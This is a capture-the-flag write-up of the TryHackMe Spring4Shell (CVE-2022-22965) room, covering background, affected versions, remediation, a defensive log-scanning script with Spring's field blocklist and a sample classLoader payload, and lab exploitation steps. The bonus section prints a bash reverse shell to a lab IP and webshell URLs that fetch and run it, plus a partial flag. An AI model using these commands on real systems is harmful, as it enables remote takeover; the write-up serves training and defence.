Spring4Shell: CVE-2022-22965

This write-up covers remote command execution against a vulnerable Java Spring Framework deployment. One issue affects the framework component called "Spring Cloud Functions"; the secondary vulnerability affects "Spring Core", takes its name from Log4Shell, and is known as "Spring4Shell".


Legal Notice && Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an "ethical hacker" standpoint. Only perform testing on systems you OWN and/or have express written permission for. Use information at your own risk. By continuing, you acknowledge the aforementioned user risk/responsibilities.


Task 2 Tutorial Vulnerability Background

SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file.

Workings of CVE

(Copied from TryHackMe Room: https://tryhackme.com/room/spring4shell)

Model-View-Controller is part of the Spring Framework which is used to develop web applications following a design pattern. The patterns are

Spring4Shell was originally released as an 0-day in a now-deleted thread of Tweets. It was quickly identified as a bypass of the patch for CVE-2010-1622 — a vulnerability in earlier versions of the Spring Framework which allowed attackers to obtain remote command execution by abusing the way in which Spring handles data sent in HTTP requests. In short, the vulnerability allows attackers to upload a “webshell” (a piece of code which accepts commands from the attacker that the webserver is then tricked into executing) to the vulnerable server, achieving remote command execution.

How Does it Work?

To understand Spring4Shell, it is important that we understand CVE-2010-1622. Spring MVC (Model-View-Controller) is part of the Spring Framework which makes it easy to develop web applications following the MVC design pattern. One of the features of Spring MVC is that it automatically instantiates and populates an object of a specified class when a request is made based on the parameters sent to the endpoint. In simple terms, this could be abused to overwrite important attributes of the parent class, resulting in remote code execution. Spring4Shell works along similar lines, bypassing the mitigations that were added to patch CVE-2010-1622. The majority of the exploits for the Spring4Shell vulnerability operate by forcing the application to write a malicious .jsp file (effectively plaintext Java which Tomcat can execute — much like a PHP webserver would execute files with a .php extension) to the webserver. This webshell can then be executed to gain remote command execution over the target.

Limitations

Fortunately, despite how commonly used the Spring Framework is, the conditions in which the vulnerability can be exploited are actually fairly limited. The Spring4Shell vulnerability affects Spring Core before version 5.2, as well as in versions 5.3.0-17 and 5.2.0-19, running on a version of the Java Development Kit (JDK) greater than or equal to 9. The publicly available exploits currently available only work on applications deployed to Apache Tomcat as WARs; however, the Spring Framework maintainers have stated that they believe there may be other ways to exploit the vulnerability. Current conditions for vulnerability (as stated in Spring's announcement of the vulnerability) can be summarised as follows:

  • JDK 9+
  • A vulnerable version of the Spring Framework (<5.2, 5.2.0-19, 5.3.0-17)
  • Apache Tomcat as a server for the Spring application, packaged as a WAR
  • A dependency on the spring-webmvc and/or spring-webflux components of the Spring Framework

It is worth noting, however, that these may change over time as other ways to exploit the vulnerability are discovered.

Remediations

Fortunately, patched versions of the Spring Framework have been released. To remediate Spring4Shell, ensure that you are using a version of Spring released after patch 18 of minor release 5.3 (i.e. after 5.3.18), or after patch 20 if using minor release 5.2 (i.e. after 5.2.20). Upgrading the version of the framework is enough to remove the vulnerability from your applications. If upgrading is not possible, it is possible to somewhat mitigate this vulnerability by setting a blocklist of vulnerable field patterns. More advice on this can be found here.
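As an added example (not code from the original write-up or the TryHackMe room), the Python below turns the preconditions from the Limitations list into a version check and applies the field-name blocklist that Spring published as its workaround to request parameter names, running it over a few constructed Tomcat access-log lines to flag data-binder abuse attempts. The log lines, client IPs and the attacker.invalid host are constructed; the four blocklist patterns are Spring's published ones, while the fnmatch matching here is a simplified stand-in for Spring's own pattern matcher.

```python
import re
from fnmatch import fnmatchcase
from urllib.parse import parse_qsl, urlsplit

# Spring's published workaround: field-name patterns the data binder must reject.
DISALLOWED_FIELD_PATTERNS = ("class.*", "Class.*", "*.class.*", "*.Class.*")
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")  # tolerates a .RELEASE suffix

def spring_version_vulnerable(version):
    """Affected ranges stated above: <5.2, 5.2.0-5.2.19, 5.3.0-5.3.17."""
    m = _VERSION_RE.match(version)
    if not m:
        raise ValueError("unrecognised Spring version: %r" % version)
    major, minor, patch = (int(g) for g in m.groups())
    if (major, minor) < (5, 2):
        return True
    if (major, minor) == (5, 2):
        return patch <= 19  # fixed in 5.2.20
    if (major, minor) == (5, 3):
        return patch <= 17  # fixed in 5.3.18
    return False

def deployment_exploitable(version, jdk_major, tomcat_war):
    """All three published preconditions must hold at once."""
    return spring_version_vulnerable(version) and jdk_major >= 9 and tomcat_war

def disallowed_fields(query):
    """Parameter names in a query string that the blocklist would reject."""
    names = [name for name, _ in parse_qsl(query, keep_blank_values=True)]
    return [n for n in names if any(fnmatchcase(n, p) for p in DISALLOWED_FIELD_PATTERNS)]

def flag_access_log(lines):
    """Yield (client_ip, rejected_names) for each access-log line carrying one."""
    for line in lines:
        try:  # quoted request is '"METHOD /path?query PROTOCOL"'
            target = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue  # not in common log format
        hits = disallowed_fields(urlsplit(target).query)
        if hits:
            yield line.split(" ", 1)[0], hits

# Constructed sample Tomcat access-log lines (not real traffic): one benign request,
# one CVE-2010-1622-style classLoader binding attempt, one nested/capitalised variant.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Apr/2022:10:00:00 +0000] "GET /app/greet?name=alice&age=30 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Apr/2022:10:00:07 +0000] "POST /app/greet?class.classLoader.URLs%5B0%5D=jar:http://attacker.invalid/x.jar HTTP/1.1" 200 0',
    '10.0.0.9 - - [01/Apr/2022:10:00:09 +0000] "GET /app/greet?user.Class.module.classLoader.x=y HTTP/1.1" 400 0',
]
```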

Task 3 Practical Exploitation

Download the file and unzip it with the password TryHackMe123!

Exploit.py

Target IP: 10.10.222.167

source:

Exploit Target

python3 exploit.py http://10.10.222.167

![](https://paper-attachments.dropbox.com/s_9B468C5B34E463A3B8A2E9D3664DBC7DF5F5BB96AF653EC4B8D7624BE536D87C_1649353814581_image.png)

Access target:

Answer the questions below

Follow the steps in the task to exploit Spring4Shell and obtain a webshell.

no answer needed

[Bonus Question: Optional] Use your webshell to obtain a reverse/bind shell on the target. Create bashshell.sh:

#!/bin/bash

# interactive bash reverse shell back to the listener on 10.6.124.83:443
bash -i >& /dev/tcp/10.6.124.83/443 0>&1

http://10.10.222.167/tomcatwar.jsp?pwd=thm&cmd=curl%2010.6.124.83/bashshell.sh%20-o%20/dev/shm/bashshell.sh

Upload the script to /dev/shm on the target and run chmod 777 bashshell.sh.

Execute the script from the browser via the cmd parameter:

http://10.10.222.167/tomcatwar.jsp?pwd=thm&cmd=bash%20/dev/shm/bashshell.sh

What is the flag in /root/flag.txt?

THM{NjAyNzkyMjU0Mz....wZDdiM2E5YzFm}